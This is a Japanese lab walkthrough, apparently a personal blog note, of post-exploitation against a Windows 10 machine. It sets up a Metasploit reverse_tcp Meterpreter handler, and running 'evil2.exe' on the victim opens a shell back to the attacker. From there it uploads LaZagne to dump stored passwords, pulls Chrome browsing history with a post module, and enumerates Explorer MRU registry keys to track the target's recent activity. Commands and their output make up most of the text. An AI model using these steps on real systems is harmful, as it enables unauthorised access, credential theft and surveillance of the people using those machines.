windows 10 のパスワード探しとブラウザ履歴

windows 10 のパスワード探しとブラウザ履歴

LaZagne を使うため
KaliLinux で

https://github.com/AlessandroZ/LaZagne/releases
からダウンロード

wget https://github.com/AlessandroZ/LaZagne/releases/download/2.4.3/lazagne.exe

でもダウンロードできる

次に

service apache2 restart 

で apache２を再起動

msfconsole 

で msfconsole を立ち上げ

use exploit/multi/handler 
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.1.134
exploit -j -z

で待受にする

次に windows10 で evil2.exe を実行

これでセッションが繋がる

sessions -i 1

次に

upload lazagne.exe

で windows10 へファイルをアップロード

shell

で windows10 のシェルになり

lazagne.exe all

を実行
ただしユーザ権限だとパスワードは発見できなかった

次にブラウザ履歴を調べる

use post/windows/gather/forensics/browser_history 

でセッションをセット

run

で実行

実行すると
.msf4/local/
以下にふぁいるが作成される

今回は
snowpool_ChromeHistory_Default_History.
となった

なお対応しているのは
Firefox
Chrome
Skype
となっているため
Edge の履歴を得ることはできなかった

デフォルトでは chrome がインストールされていないので
インストールしてから実行

 file .msf4/local/snowpool_ChromeHistory_Default_History. 

でファイルを確認すると

.msf4/local/snowpool_ChromeHistory_Default_History.: SQLite 3.x database, last written using SQLite version 3030001

となり
SQLファイルであることがわかる

なお、隠しファイルになっているので

cp .msf4/local/snowpool_ChromeHistory_Default_History. .

としておくとファイルを見つけやすくなる

これの中身をみるには
show application をクリック

sqlte database 　で検索し
DB Browser for 　をクリック

Open Database をクリックし
ファイルの種類を All files にして対象ファイルを開く

urls を右クリック > Browse Table

これで閲覧した履歴のURLをみることができる

次にMRUの取得

sessions -i 1

でセッションを確立し

reg enumkey -k HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\

MRUは
Most Reccently Used で最近使ったリストのこと

これはターゲットの最近の行動を知るのに使う

今回の実行結果は

  Keys (36):

	Accent
	Advanced
	AutoplayHandlers
	BamThrottling
	BannerStore
	BitBucket
	CabinetState
	CD Burning
	CLSID
	Desktop
	Discardable
	FileExts
	HideDesktopIcons
	LogonStats
	LowRegistry
	MenuOrder
	Modules
	MountPoints2
	Package Installation
	RecentDocs
	RestartCommands
	Ribbon
	SearchPlatform
	Shell Folders
	Shutdown
	StartPage
	StartupApproved
	Streams
	StuckRects3
	Taskband
	User Shell Folders
	UserAssist
	VirtualDesktops
	VisualEffects
	Wallpapers
	SessionInfo

  Values (12):

	ExplorerStartupTraceRecorded
	ShellState
	UserSignedIn
	SlowContextMenuEntries
	SIDUpdatedOnLibraries
	LocalKnownFoldersMigrated
	TelemetrySalt
	GlobalAssocChangedCounter
	FirstRunTelemetryComplete
	EdgeDesktopShortcutCreated
	AppReadinessLogonComplete
	PostAppInstallTasksCompleted

となった